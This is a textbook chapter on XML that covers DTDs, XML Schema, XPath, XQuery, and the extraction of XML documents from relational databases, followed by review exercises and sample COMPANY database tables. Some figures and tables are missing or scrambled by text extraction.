■ Data-centric XML documents. These documents have many small data
items that follow a specific structure and hence may be extracted from a
structured database. They are formatted as XML documents in order to
exchange them over or display them on the Web. These usually follow a
predefined schema that defines the tag names.

■ Document-centric XML documents. These are documents with large
amounts of text, such as news articles or books. There are few or no struc-
tured data elements in these documents.

■ Hybrid XML documents. These documents may have parts that contain
structured data and other parts that are predominantly textual or unstruc-
tured. They may or may not have a predefined schema.

XML documents that do not follow a predefined schema of element names and cor-
responding tree structure are known as schemaless XML documents. It is impor-
tant to note that data-centric XML documents can be considered either as
semistructured data or as structured data as defined in Section 1. If an XML docu-
ment conforms to a predefined XML schema or DTD (see Section 3), then the doc-
ument can be considered as structured data. On the other hand, XML allows
documents that do not conform to any schema; these would be considered as
semistructured data and are schemaless XML documents. When the value of the
standalone attribute in an XML document is yes, as in the first line in Figure 3, the
document is standalone and schemaless.

XML attributes are generally used in a manner similar to how they are used in
HTML (see Figure 2), namely, to describe properties and characteristics of the ele-
ments (tags) within which they appear. It is also possible to use XML attributes to
hold the values of simple data elements; however, this is generally not recom-
mended. An exception to this rule is in cases that need to reference another element
in another part of the XML document. To do this, it is common to use attribute val-
ues in one element as the references. This resembles the concept of foreign keys in
relational databases, and is a way to get around the strict hierarchical model that the
XML tree model implies. We discuss XML attributes further in Section 3 when we
discuss XML schema and DTD.

427

XML: Extensible Markup Language

3 XML Documents, DTD, and XML Schema

3.1 Well-Formed and Valid XML Documents
and XML DTD

In Figure 3, we saw what a simple XML document may look like. An XML docu-
ment is well formed if it follows a few conditions. In particular, it must start with an
XML declaration to indicate the version of XML being used as well as any other rel-
evant attributes, as shown in the first line in Figure 3. It must also follow the syntac-
tic guidelines of the tree data model. This means that there should be a single root
element, and every element must include a matching pair of start and end tags
within the start and end tags of the parent element. This ensures that the nested ele-
ments specify a well-formed tree structure.

A well-formed XML document is syntactically correct. This allows it to be processed
by generic processors that traverse the document and create an internal tree repre-
sentation. A standard model with an associated set of API (application program-
ming interface) functions called DOM (Document Object Model) allows programs
to manipulate the resulting tree representation corresponding to a well-formed
XML document. However, the whole document must be parsed beforehand when
using DOM in order to convert the document to that standard DOM internal data
structure representation. Another API called SAX (Simple API for XML) allows
processing of XML documents on the fly by notifying the processing program
through callbacks whenever a start or end tag is encountered. This makes it easier to
process large documents and allows for processing of so-called streaming XML
documents, where the processing program can process the tags as they are encoun-
tered. This is also known as event-based processing.

A well-formed XML document can be schemaless; that is, it can have any tag names
for the elements within the document. In this case, there is no predefined set of ele-
ments (tag names) that a program processing the document knows to expect. This
gives the document creator the freedom to specify new elements, but limits the pos-
sibilities for automatically interpreting the meaning or semantics of the elements
within the document.

A stronger criterion is for an XML document to be valid. In this case, the document
must be well formed, and it must follow a particular schema. That is, the element
names used in the start and end tag pairs must follow the structure specified in a
separate XML DTD (Document Type Definition) file or XML schema file. We first
discuss XML DTD here, and then we give an overview of XML schema in Section
3.2. Figure 4 shows a simple XML DTD file, which specifies the elements (tag
names) and their nested structures. Any valid documents conforming to this DTD
should follow the specified structure. A special syntax exists for specifying DTD
files, as illustrated in Figure 4. First, a name is given to the root tag of the document,
which is called Projects in the first line in Figure 4. Then the elements and their
nested structure are specified.

428

XML: Extensible Markup Language

Figure 4
An XML DTD file
called Projects.

When specifying elements, the following notation is used:

■ A * following the element name means that the element can be repeated zero
or more times in the document. This kind of element is known as an optional
multivalued (repeating) element.

■ A + following the element name means that the element can be repeated one
or more times in the document. This kind of element is a required multival-
ued (repeating) element.

■ A ? following the element name means that the element can be repeated zero
or one times. This kind is an optional single-valued (nonrepeating) element.

■ An element appearing without any of the preceding three symbols must
appear exactly once in the document. This kind is a required single-valued
(nonrepeating) element.

■ The type of the element is specified via parentheses following the element. If
the parentheses include names of other elements, these latter elements are
the children of the element in the tree structure. If the parentheses include
the keyword #PCDATA or one of the other data types available in XML DTD,
the element is a leaf node. PCDATA stands for parsed character data, which is
roughly similar to a string data type.

■ The list of attributes that can appear within an element can also be specified
via the keyword !ATTLIST. In Figure 3, the Project element has an attribute
ProjId. If the type of an attribute is ID, then it can be referenced from another
attribute whose type is IDREF within another element. Notice that attributes
can also be used to hold the values of simple data elements of type #PCDATA.

■ Parentheses can be nested when specifying elements.
■ A bar symbol ( e1 | e2 ) specifies that either e1 or e2 can appear in the docu-

ment.


>








] >

429

XML: Extensible Markup Language

We can see that the tree structure in Figure 1 and the XML document in Figure 3
conform to the XML DTD in Figure 4. To require that an XML document be
checked for conformance to a DTD, we must specify this in the declaration of the
document. For example, we could change the first line in Figure 3 to the
following:


When the value of the standalone attribute in an XML document is “no”, the docu-
ment needs to be checked against a separate DTD document or XML schema docu-
ment (see below). The DTD file shown in Figure 4 should be stored in the same file
system as the XML document, and should be given the file name proj.dtd.
Alternatively, we could include the DTD document text at the beginning of the
XML document itself to allow the checking.

Although XML DTD is quite adequate for specifying tree structures with required,
optional, and repeating elements, and with various types of attributes, it has several
limitations. First, the data types in DTD are not very general. Second, DTD has its
own special syntax and thus requires specialized processors. It would be advanta-
geous to specify XML schema documents using the syntax rules of XML itself so
that the same processors used for XML documents could process XML schema
descriptions. Third, all DTD elements are always forced to follow the specified
ordering of the document, so unordered elements are not permitted. These draw-
backs led to the development of XML schema, a more general but also more com-
plex language for specifying the structure and elements of XML documents.

3.2 XML Schema
The XML schema language is a standard for specifying the structure of XML docu-
ments. It uses the same syntax rules as regular XML documents, so that the same
processors can be used on both. To distinguish the two types of documents, we will
use the term XML instance document or XML document for a regular XML docu-
ment, and XML schema document for a document that specifies an XML schema.
Figure 5 shows an XML schema document corresponding to the COMPANY data-
base shown in Figures A.2 and A.3. Although it is unlikely that we would want to
display the whole database as a single document, there have been proposals to store
data in native XML format as an alternative to storing the data in relational data-
bases. The schema in Figure 5 would serve the purpose of specifying the structure of
the COMPANY database if it were stored in a native XML system. We discuss this
topic further in Section 4.

As with XML DTD, XML schema is based on the tree data model, with elements and
attributes as the main structuring concepts. However, it borrows additional concepts
from database and object models, such as keys, references, and identifiers. Here we
describe the features of XML schema in a step-by-step manner, referring to the sam-
ple XML schema document in Figure 5 for illustration. We introduce and describe
some of the schema concepts in the order in which they are used in Figure 5.

430

XML: Extensible Markup Language

Figure 5
An XML schema file called company.



Company Schema (Element Approach) – Prepared by Babak

Hojabri























431



































XML: Extensible Markup Language

(continues)

432

Figure 5 (continued)
An XML schema called company.





























XML: Extensible Markup Language

1. Schema descriptions and XML namespaces. It is necessary to identify the
specific set of XML schema language elements (tags) being used by specify-
ing a file stored at a Web site location. The second line in Figure 5 specifies

433

XML: Extensible Markup Language

the file used in this example, which is http://www.w3.org/2001/XMLSchema.
This is a commonly used standard for XML schema commands. Each such
definition is called an XML namespace, because it defines the set of com-
mands (names) that can be used. The file name is assigned to the variable xsd
(XML schema description) using the attribute xmlns (XML namespace), and
this variable is used as a prefix to all XML schema commands (tag names).
For example, in Figure 5, when we write xsd:element or xsd:sequence, we are
referring to the definitions of the element and sequence tags as defined in the
file http://www.w3.org/2001/XMLSchema.

2. Annotations, documentation, and language used. The next couple of lines
in Figure 5 illustrate the XML schema elements (tags) xsd:annotation and
xsd:documentation, which are used for providing comments and other
descriptions in the XML document. The attribute xml:lang of the
xsd:documentation element specifies the language being used, where en stands
for the English language.

3. Elements and types. Next, we specify the root element of our XML schema.
In XML schema, the name attribute of the xsd:element tag specifies the ele-
ment name, which is called company for the root element in our example (see
Figure 5). The structure of the company root element can then be specified,
which in our example is xsd:complexType. This is further specified to be a
sequence of departments, employees, and projects using the xsd:sequence
structure of XML schema. It is important to note here that this is not the
only way to specify an XML schema for the COMPANY database. We will dis-
cuss other options in Section 6.

4. First-level elements in the COMPANY database. Next, we specify the three
first-level elements under the company root element in Figure 5. These ele-
ments are named employee, department, and project, and each is specified in
an xsd:element tag. Notice that if a tag has only attributes and no further
subelements or data within it, it can be ended with the backslash symbol (/>)
directly instead of having a separate matching end tag. These are called
empty elements; examples are the xsd:element elements named department
and project in Figure 5.

5. Specifying element type and minimum and maximum occurrences. In
XML schema, the attributes type, minOccurs, and maxOccurs in the
xsd:element tag specify the type and multiplicity of each element in any doc-
ument that conforms to the schema specifications. If we specify a type attrib-
ute in an xsd:element, the structure of the element must be described
separately, typically using the xsd:complexType element of XML schema. This
is illustrated by the employee, department, and project elements in Figure 5. On
the other hand, if no type attribute is specified, the element structure can be
defined directly following the tag, as illustrated by the company root element
in Figure 5. The minOccurs and maxOccurs tags are used for specifying lower
and upper bounds on the number of occurrences of an element in any XML

434

document that conforms to the schema specifications. If they are not speci-
fied, the default is exactly one occurrence. These serve a similar role to the *,
+, and ? symbols of XML DTD.

6. Specifying keys. In XML schema, it is possible to specify constraints that
correspond to unique and primary key constraints in a relational database,
as well as foreign keys (or referential integrity) constraints. The xsd:unique
tag specifies elements that correspond to unique attributes in a relational
database. We can give each such uniqueness constraint a name, and we must
specify xsd:selector and xsd:field tags for it to identify the element type that
contains the unique element and the element name within it that is unique
via the xpath attribute. This is illustrated by the departmentNameUnique and
projectNameUnique elements in Figure 5. For specifying primary keys, the tag
xsd:key is used instead of xsd:unique, as illustrated by the projectNumberKey,
departmentNumberKey, and employeeSSNKey elements in Figure 5. For speci-
fying foreign keys, the tag xsd:keyref is used, as illustrated by the six xsd:keyref
elements in Figure 5. When specifying a foreign key, the attribute refer of the
xsd:keyref tag specifies the referenced primary key, whereas the tags
xsd:selector and xsd:field specify the referencing element type and foreign key
(see Figure 5).

7. Specifying the structures of complex elements via complex types. The next
part of our example specifies the structures of the complex elements
Department, Employee, Project, and Dependent, using the tag xsd:complexType
(see Figure 5). We specify each of these as a sequence of subelements corre-
sponding to the database attributes of each entity type (see Figure A.4) by
using the xsd:sequence and xsd:element tags of XML schema. Each element is
given a name and type via the attributes name and type of xsd:element. We can
also specify minOccurs and maxOccurs attributes if we need to change the
default of exactly one occurrence. For (optional) database attributes where
null is allowed, we need to specify minOccurs = 0, whereas for multivalued
database attributes we need to specify maxOccurs = “unbounded” on the corre-
sponding element. Notice that if we were not going to specify any key con-
straints, we could have embedded the subelements within the parent
element definitions directly without having to specify complex types.
However, when unique, primary key and foreign key constraints need to be
specified; we must define complex types to specify the element structures.

8. Composite (compound) attributes. Composite attributes from Figure A.3
are also specified as complex types in Figure 7, as illustrated by the Address,
Name, Worker, and WorksOn complex types. These could have been directly
embedded within their parent elements.

This example illustrates some of the main features of XML schema. There are other
features, but they are beyond the scope of our presentation. In the next section, we
discuss the different approaches to creating XML documents from relational data-
bases and storing XML documents.

XML: Extensible Markup Language

435

XML: Extensible Markup Language

4 Storing and Extracting XML Documents from
Databases

Several approaches to organizing the contents of XML documents to facilitate their
subsequent querying and retrieval have been proposed. The following are the most
common approaches:

1. Using a DBMS to store the documents as text. A relational or object DBMS
can be used to store whole XML documents as text fields within the DBMS
records or objects. This approach can be used if the DBMS has a special
module for document processing, and would work for storing schemaless
and document-centric XML documents.

2. Using a DBMS to store the document contents as data elements. This
approach would work for storing a collection of documents that follow a
specific XML DTD or XML schema. Because all the documents have the
same structure, one can design a relational (or object) database to store the
leaf-level data elements within the XML documents. This approach would
require mapping algorithms to design a database schema that is compatible
with the XML document structure as specified in the XML schema or DTD
and to recreate the XML documents from the stored data. These algorithms
can be implemented either as an internal DBMS module or as separate mid-
dleware that is not part of the DBMS.

3. Designing a specialized system for storing native XML data. A new type of
database system based on the hierarchical (tree) model could be designed
and implemented. Such systems are being called Native XML DBMSs. The
system would include specialized indexing and querying techniques, and
would work for all types of XML documents. It could also include data com-
pression techniques to reduce the size of the documents for storage. Tamino
by Software AG and the Dynamic Application Platform of eXcelon are two
popular products that offer native XML DBMS capability. Oracle also offers
a native XML storage option.

4. Creating or publishing customized XML documents from preexisting
relational databases. Because there are enormous amounts of data already
stored in relational databases, parts of this data may need to be formatted as
documents for exchanging or displaying over the Web. This approach would
use a separate middleware software layer to handle the conversions needed
between the XML documents and the relational database. Section 6 discusses
this approach, in which data-centric XML documents are extracted from
existing databases, in more detail. In particular, we show how tree structured
documents can be created from graph-structured databases. Section 6.2 dis-
cusses the problem of cycles and how to deal with it.

All of these approaches have received considerable attention. We focus on the fourth
approach in Section 6, because it gives a good conceptual understanding of the dif-
ferences between the XML tree data model and the traditional database models

436

based on flat files (relational model) and graph representations (ER model). But
first we give an overview of XML query languages in Section 5.

5 XML Languages
There have been several proposals for XML query languages, and two query language
standards have emerged. The first is XPath, which provides language constructs for
specifying path expressions to identify certain nodes (elements) or attributes within
an XML document that match specific patterns. The second is XQuery, which is a
more general query language. XQuery uses XPath expressions but has additional
constructs. We give an overview of each of these languages in this section. Then we
discuss some additional languages related to HTML in Section 5.3.

5.1 XPath: Specifying Path Expressions in XML
An XPath expression generally returns a sequence of items that satisfy a certain pat-
tern as specified by the expression. These items are either values (from leaf nodes)
or elements or attributes. The most common type of XPath expression returns a col-
lection of element or attribute nodes that satisfy certain patterns specified in the
expression. The names in the XPath expression are node names in the XML docu-
ment tree that are either tag (element) names or attribute names, possibly with
additional qualifier conditions to further restrict the nodes that satisfy the pattern.
Two main separators are used when specifying a path: single slash (/) and double
slash (//). A single slash before a tag specifies that the tag must appear as a direct
child of the previous (parent) tag, whereas a double slash specifies that the tag can
appear as a descendant of the previous tag at any level. Let us look at some examples
of XPath as shown in Figure 6.

The first XPath expression in Figure 6 returns the company root node and all its
descendant nodes, which means that it returns the whole XML document. We
should note that it is customary to include the file name in the XPath query. This
allows us to specify any local file name or even any path name that specifies a file on
the Web. For example, if the COMPANY XML document is stored at the location

www.company.com/info.XML

then the first XPath expression in Figure 6 can be written as

doc(www.company.com/info.XML)/company

This prefix would also be included in the other examples of XPath expressions.

XML: Extensible Markup Language

Figure 6
Some examples of
XPath expressions on
XML documents that
follow the XML
schema file company
in Figure 5.

1. /company

2. /company/department

3. //employee [employeeSalary gt 70000]/employeeName

4. /company/employee [employeeSalary gt 70000]/employeeName

5. /company/project/projectWorker [hours ge 20.0]

437

XML: Extensible Markup Language

The second example in Figure 6 returns all department nodes (elements) and their
descendant subtrees. Note that the nodes (elements) in an XML document are
ordered, so the XPath result that returns multiple nodes will do so in the same order
in which the nodes are ordered in the document tree.

The third XPath expression in Figure 6 illustrates the use of //, which is conve-nient
to use if we do not know the full path name we are searching for, but do know the
name of some tags of interest within the XML document. This is particularly useful
for schemaless XML documents or for documents with many nested levels of
nodes.6

The expression returns all employeeName nodes that are direct children of an
employee node, such that the employee node has another child element employeeSalary
whose value is greater than 70000. This illustrates the use of qualifier conditions,
which restrict the nodes selected by the XPath expression to those that satisfy the con-
dition. XPath has a number of comparison operations for use in qualifier conditions,
including standard arithmetic, string, and set comparison operations.

The fourth XPath expression in Figure 6 should return the same result as the previ-
ous one, except that we specified the full path name in this example. The fifth
expression in Figure 6 returns all projectWorker nodes and their descendant nodes
that are children under a path /company/project and have a child node hours with a
value greater than 20.0 hours.

When we need to include attributes in an XPath expression, the attribute name is
prefixed by the @ symbol to distinguish it from element (tag) names. It is also pos-
sible to use the wildcard symbol *, which stands for any element, as in the following
example, which retrieves all elements that are child elements of the root, regardless
of their element type. When wildcards are used, the result can be a sequence of dif-
ferent types of items.

/company/*

The examples above illustrate simple XPath expressions, where we can only move
down in the tree structure from a given node. A more general model for path
expressions has been proposed. In this model, it is possible to move in multiple
directions from the current node in the path expression. These are known as the
axes of an XPath expression. Our examples above used only three of these axes: child
of the current node (/), descendent or self at any level of the current node (//), and
attribute of the current node (@). Other axes include parent, ancestor (at any level),
previous sibling (any node at same level to the left in the tree), and next sibling (any
node at the same level to the right in the tree). These axes allow for more complex
path expressions.

The main restriction of XPath path expressions is that the path that specifies the pat-
tern also specifies the items to be retrieved. Hence, it is difficult to specify certain
conditions on the pattern while separately specifying which result items should be

6We use the terms node, tag, and element interchangeably here.

438

retrieved. The XQuery language separates these two concerns, and provides more
powerful constructs for specifying queries.

5.2 XQuery: Specifying Queries in XML
XPath allows us to write expressions that select items from a tree-structured XML
document. XQuery permits the specification of more general queries on one or more
XML documents. The typical form of a query in XQuery is known as a FLWR
expression, which stands for the four main clauses of XQuery and has the following
form:

FOR
LET
WHERE
RETURN

There can be zero or more instances of the FOR clause, as well as of the LET clause in
a single XQuery. The WHERE clause is optional, but can appear at most once, and the
RETURN clause must appear exactly once. Let us illustrate these clauses with the fol-
lowing simple example of an XQuery.

LET $d := doc(www.company.com/info.xml)
FOR $x IN $d/company/project[projectNumber = 5]/projectWorker,

$y IN $d/company/employee
WHERE $x/hours gt 20.0 AND $y.ssn = $x.ssn
RETURN $y/employeeName/firstName, $y/employeeName/lastName,

$x/hours

1. Variables are prefixed with the $ sign. In the above example, $d, $x, and $y
are variables.

2. The LET clause assigns a variable to a particular expression for the rest of the
query. In this example, $d is assigned to the document file name. It is possi-
ble to have a query that refers to multiple documents by assigning multiple
variables in this way.

3. The FOR clause assigns a variable to range over each of the individual items
in a sequence. In our example, the sequences are specified by path expres-
sions. The $x variable ranges over elements that satisfy the path expression
$d/company/project[projectNumber = 5]/projectWorker. The $y variable ranges
over elements that satisfy the path expression $d/company/employee. Hence,
$x ranges over projectWorker elements, whereas $y ranges over employee ele-
ments.

4. The WHERE clause specifies additional conditions on the selection of items.
In this example, the first condition selects only those projectWorker elements
that satisfy the condition (hours gt 20.0). The second condition specifies a
join condition that combines an employee with a projectWorker only if they
have the same ssn value.

5. Finally, the RETURN clause specifies which elements or attributes should be
retrieved from the items that satisfy the query conditions. In this example, it

XML: Extensible Markup Language

439

XML: Extensible Markup Language

will return a sequence of elements each containing for employees who work more that 20 hours per week on project
number 5.

Figure 7 includes some additional examples of queries in XQuery that can be speci-
fied on an XML instance documents that follow the XML schema document in
Figure 5. The first query retrieves the first and last names of employees who earn
more than $70,000. The variable $x is bound to each employeeName element that is a
child of an employee element, but only for employee elements that satisfy the quali-
fier that their employeeSalary value is greater than $70,000. The result retrieves
the firstName and lastName child elements of the selected employeeName elements.
The second query is an alternative way of retrieving the same elements retrieved by
the first query.

The third query illustrates how a join operation can be performed by using more
than one variable. Here, the $x variable is bound to each projectWorker element that
is a child of project number 5, whereas the $y variable is bound to each employee ele-
ment. The join condition matches ssn values in order to retrieve the employee
names. Notice that this is an alternative way of specifying the same query in our ear-
lier example, but without the LET clause.

XQuery has very powerful constructs to specify complex queries. In particular, it can
specify universal and existential quantifiers in the conditions of a query, aggregate
functions, ordering of query results, selection based on position in a sequence, and
even conditional branching. Hence, in some ways, it qualifies as a full-fledged pro-
gramming language.

This concludes our brief introduction to XQuery. The interested reader is referred to
www.w3.org, which contains documents describing the latest standards related to
XML and XQuery. The next section briefly discusses some additional languages and
protocols related to XML.

Figure 7
Some examples of XQuery
queries on XML documents
that follow the XML schema
file company in Figure 5.

1. FOR $x IN
doc(www.company.com/info.xml)
//employee [employeeSalary gt 70000]/employeeName
RETURN $x/firstName, $x/lastName

2. FOR $x IN
doc(www.company.com/info.xml)/company/employee
WHERE $x/employeeSalary gt 70000
RETURN $x/employeeName/firstName, $x/employeeName/lastName

3. FOR $x IN
doc(www.company.com/info.xml)/company/project[projectNumber = 5]/projectWorker,
$y IN doc(www.company.com/info.xml)/company/employee
WHERE $x/hours gt 20.0 AND $y.ssn = $x.ssn
RETURN $y/employeeName/firstName, $y/employeeName/lastName, $x/hours

440

XML: Extensible Markup Language

5.3 Other Languages and Protocols Related to XML
There are several other languages and protocols related to XML technology. The
long-term goal of these and other languages and protocols is to provide the technol-
ogy for realization of the Semantic Web, where all information in the Web can be
intelligently located and processed.

■ The Extensible Stylesheet Language (XSL) can be used to define how a doc-
ument should be rendered for display by a Web browser.

■ The Extensible Stylesheet Language for Transformations (XSLT) can be used
to transform one structure into a different structure. Hence, it can convert
documents from one form to another.

■ The Web Services Description Language (WSDL) allows for the description
of Web Services in XML. This makes the Web Service available to users and
programs over the Web.

■ The Simple Object Access Protocol (SOAP) is a platform-independent and
programming language-independent protocol for messaging and remote
procedure calls.

■ The Resource Description Framework (RDF) provides languages and tools
for exchanging and processing of meta-data (schema) descriptions and spec-
ifications over the Web.

6 Extracting XML Documents from Relational
Databases

6.1 Creating Hierarchical XML Views over Flat
or Graph-Based Data

This section discusses the representational issues that arise when converting data
from a database system into XML documents. As we have discussed, XML uses a
hierarchical (tree) model to represent documents. The database systems with the
most widespread use follow the flat relational data model. When we add referential
integrity constraints, a relational schema can be considered to be a graph structure
(for example, see Figure A.4). Similarly, the ER model represents data using graph-
like structures (for example, see Figure A.3). There are straightforward mappings
between the ER and relational models, so we can conceptually represent a relational
database schema using the corresponding ER schema. Although we will use the ER
model in our discussion and examples to clarify the conceptual differences between
tree and graph models, the same issues apply to converting relational data to XML.

We will use the simplified UNIVERSITY ER schema shown in Figure 8 to illustrate our
discussion. Suppose that an application needs to extract XML documents for stu-
dent, course, and grade information from the UNIVERSITY database. The data
needed for these documents is contained in the database attributes of the entity

441

XML: Extensible Markup Language

Name

S-D

Students

Courses

Instructors

Major dept Department

1 1

1

1

N

N

S-S C-S S-1

D-1

D-C

DEPARTMENT

COURSE

SECTION

Name

Ssn

N
N

M 1

Class

YearNumber Qtr

Grade

STUDENT

Sections
completed

Sections taught

N N
Students attended Instructors

NameSsn
Name

Number

Rank

SalaryINSTRUCTOR

Department

Course

Sections

Figure 8
An ER schema diagram for a sim-
plified UNIVERSITY database.

types COURSE, SECTION, and STUDENT from Figure 8, and the relationships
S-S and C-S between them. In general, most documents extracted from a database
will only use a subset of the attributes, entity types, and relationships in the database.
In this example, the subset of the database that is needed is shown in Figure 9.

At least three possible document hierarchies can be extracted from the database
subset in Figure 9. First, we can choose COURSE as the root, as illustrated in Figure
10. Here, each course entity has the set of its sections as subelements, and each sec-
tion has its students as subelements. We can see one consequence of modeling the
information in a hierarchical tree structure. If a student has taken multiple sections,
that student’s information will appear multiple times in the document—once
under each section. A possible simplified XML schema for this view is shown in
Figure 11. The Grade database attribute in the S-S relationship is migrated to the
STUDENT element. This is because STUDENT becomes a child of SECTION in this
hierarchy, so each STUDENT element under a specific SECTION element can have a
specific grade in that section. In this document hierarchy, a student taking more
than one section will have several replicas, one under each section, and each replica
will have the specific grade given in that particular section.

442

XML: Extensible Markup Language

1

Number

Sections

Name
COURSE

1

Number

Students
attended

Qtr

YearSECTION

N

N

Name

Ssn

Grade

Class
STUDENT

Figure 10
Hierarchical (tree) view with
COURSE as the root.

Figure 11
XML schema document with course as the root.









(continues)

S-D

Ssn

Name

Class

STUDENT
Sections
completed

M N N 1

Number

Year Qtr

SECTION

Number

Name

COURSES-D
Students
attended

Course Sections

Grade

Figure 9
Subset of the UNIVERSITY database schema
needed for XML document extraction.

443

XML: Extensible Markup Language

1

Ssn

Sections
completed

NameSTUDENT

1

Number

Qtr

Year
SECTION

1

N

Grade

Class

COURSE

Course_number

Course_name

Figure 12
Hierarchical (tree) view with
STUDENT as the root.

Figure 11 (continued)
XML schema document with course as the root.










In the second hierarchical document view, we can choose STUDENT as root (Figure 12). In this hierarchi-
cal view, each student has a set of sections as its child elements, and each section is related to one course
as its child, because the relationship between SECTION and COURSE is N:1. Thus, we can merge the
COURSE and SECTION elements in this view, as shown in Figure 12. In addition, the GRADE database
attribute can be migrated to the SECTION element. In this hierarchy, the combined COURSE/SECTION
information is replicated under each student who completed the section. A possible simplified XML
schema for this view is shown in Figure 13.

444

XML: Extensible Markup Language

Figure 13
XML schema
document with student
as the root.

1

Ssn
Students
attended

Name
STUDENT

1

Number

Qtr

Year
SECTION

1

N

Grade

Class

COURSE

Course_number

Course_name

Figure 14
Hierarchical (tree)
view with SECTION as
the root.

















The third possible way is to choose SECTION as the root, as shown in Figure 14.
Similar to the second hierarchical view, the COURSE information can be merged
into the SECTION element. The GRADE database attribute can be migrated to the
STUDENT element. As we can see, even in this simple example, there can be numer-
ous hierarchical document views, each corresponding to a different root and a dif-
ferent XML document structure.

445

XML: Extensible Markup Language

COURSE

INSTRUCTOR

1 1 N N

1 1NN

(a) (b)

STUDENT

DEPARTMENTSECTION COURSE

INSTRUCTOR INSTRUCTOR1

STUDENT

DEPARTMENTSECTION

(c)

STUDENT

DEPARTMENTSECTION

INSTRUCTOR COURSE1 INSTRUCTOR1 COURSE

1
M

N
N

Figure 15
Converting a graph with cycles into a hierarchical (tree) structure.

6.2 Breaking Cycles to Convert Graphs into Trees
In the previous examples, the subset of the database of interest had no cycles. It is
possible to have a more complex subset with one or more cycles, indicating multiple
relationships among the entities. In this case, it is more difficult to decide how to
create the document hierarchies. Additional duplication of entities may be needed
to represent the multiple relationships. We will illustrate this with an example using
the ER schema in Figure 8.

Suppose that we need the information in all the entity types and relationships in
Figure 8 for a particular XML document, with STUDENT as the root element. Figure
15 illustrates how a possible hierarchical tree structure can be created for this docu-
ment. First, we get a lattice with STUDENT as the root, as shown in Figure 15(a). This
is not a tree structure because of the cycles. One way to break the cycles is to repli-
cate the entity types involved in the cycles. First, we replicate INSTRUCTOR as shown
in Figure 15(b), calling the replica to the right INSTRUCTOR1. The INSTRUCTOR
replica on the left represents the relationship between instructors and the sections
they teach, whereas the INSTRUCTOR1 replica on the right represents the relation-
ship between instructors and the department each works in. After this, we still have
the cycle involving COURSE, so we can replicate COURSE in a similar manner,
leading to the hierarchy shown in Figure 15(c). The COURSE1 replica to the left
represents the relationship between courses and their sections, whereas the
COURSE replica to the right represents the relationship between courses and the
department that offers each course.

In Figure 15(c), we have converted the initial graph to a hierarchy. We can do further
merging if desired (as in our previous example) before creating the final hierarchy
and the corresponding XML schema structure.

446

XML: Extensible Markup Language

6.3 Other Steps for Extracting XML Documents
from Databases

In addition to creating the appropriate XML hierarchy and corresponding XML
schema document, several other steps are needed to extract a particular XML docu-
ment from a database:

1. It is necessary to create the correct query in SQL to extract the desired infor-
mation for the XML document.

2. Once the query is executed, its result must be restructured from the flat rela-
tional form to the XML tree structure.

3. The query can be customized to select either a single object or multiple
objects into the document. For example, in the view in Figure 13, the query
can select a single student entity and create a document correspond-ing to
that single student, or it may select several—or even all—of the students and
create a document with multiple students.

7 Summary
This chapter provided an overview of the XML standard for representing and
exchanging data over the Internet. First we discussed some of the differences
between various types of data, classifying three main types: structured, semi-struc-
tured, and unstructured. Structured data is stored in traditional databases.
Semistructured data mixes data types names and data values, but the data does not
all have to follow a fixed predefined structure. Unstructured data refers to informa-
tion displayed on the Web, specified via HTML, where information on the types of
data items is missing. We described the XML standard and its tree-structured (hier-
archical) data model, and discussed XML documents and the languages for specify-
ing the structure of these documents, namely, XML DTD (Document Type
Definition) and XML schema. We gave an overview of the various approaches for
storing XML documents, whether in their native (text) format, in a compressed
form, or in relational and other types of databases. Finally, we gave an overview of
the XPath and XQuery languages proposed for querying XML data, and discussed
the mapping issues that arise when it is necessary to convert data stored in tradi-
tional relational databases into XML documents.

Review Questions
1. What are the differences between structured, semistructured, and unstruc-

tured data?

2. Under which of the categories in 1 do XML documents fall? What about self-
describing data?

447

3. What are the differences between the use of tags in XML versus HTML?

4. What is the difference between data-centric and document-centric XML
documents?

5. What is the difference between attributes and elements in XML? List some of
the important attributes used to specify elements in XML schema.

6. What is the difference between XML schema and XML DTD?

Exercises
7. Create part of an XML instance document to correspond to the data stored

in the relational database shown in Figure A.1 such that the XML document
conforms to the XML schema document in Figure 5.

8. Create XML schema documents and XML DTDs to correspond to the hier-
archies shown in Figures 14 and 15(c).

9. Consider the LIBRARY relational database schema in Figure A.5. Create an
XML schema document that corresponds to this database schema.

10. Specify the following views as queries in XQuery on the company XML
schema shown in Figure 5.

a. A view that has the department name, manager name, and manager
salary for every department.

b. A view that has the employee name, supervisor name, and employee
salary for each employee who works in the Research department.

c. A view that has the project name, controlling department name, number
of employees, and total hours worked per week on the project for each
project.

d. A view that has the project name, controlling department name, number
of employees, and total hours worked per week on the project for each
project with more than one employee working on it.

Selected Bibliography
There are so many articles and books on various aspects of XML that it would be
impossible to make even a modest list. We will mention one book: Chaudhri,
Rashid, and Zicari, eds. (2003). This book discusses various aspects of XML and
contains a list of some references to XML research and practice.

XML: Extensible Markup Language

448

DEPT_LOCATIONS

Dnumber

Houston

Stafford

Bellaire

Sugarland

Dlocation

DEPARTMENT

Dname

Research

Administration

Headquarters 1

5

4

888665555

333445555

987654321

1981-06-19

1988-05-22

1995-01-01

Dnumber Mgr_ssn Mgr_start_date

WORKS_ON

Essn

123456789

123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777

999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3

10

20

20

20

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

NULL

Pno Hours

PROJECT

Pname

ProductX

ProductY

ProductZ

Computerization

Reorganization

Newbenefits

3

1

2

30

10

20

5

5

5

4

4

1

Houston

Bellaire

Sugarland

Stafford

Stafford

Houston

Pnumber Plocation Dnum

DEPENDENT

333445555

333445555

333445555

987654321

123456789

123456789

123456789

Joy

Alice F

M

F

M

M

F

F

1986-04-05

1983-10-25

1958-05-03

1942-02-28

1988-01-04

1988-12-30

1967-05-05

Theodore

Alice

Elizabeth

Abner

Michael

Spouse

Daughter

Son

Daughter

Spouse

Spouse

Son

Dependent_name Sex Bdate Relationship

EMPLOYEE

Fname

John

Franklin

Jennifer

Alicia

Ramesh

Joyce

James

Ahmad

Narayan

English

Borg

Jabbar

666884444

453453453

888665555

987987987

F

F

M

M

M

M

M

F

4

4

5

5

4

1

5

5

25000

43000

30000

40000

25000

55000

38000

25000

987654321

888665555

333445555

888665555

987654321

NULL

333445555

333445555

Zelaya

Wallace

Smith

Wong

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

731 Fondren, Houston, TX

638 Voss, Houston, TX

1968-01-19

1941-06-20

1965-01-09

1955-12-08

1969-03-29

1937-11-10

1962-09-15

1972-07-31

980 Dallas, Houston, TX

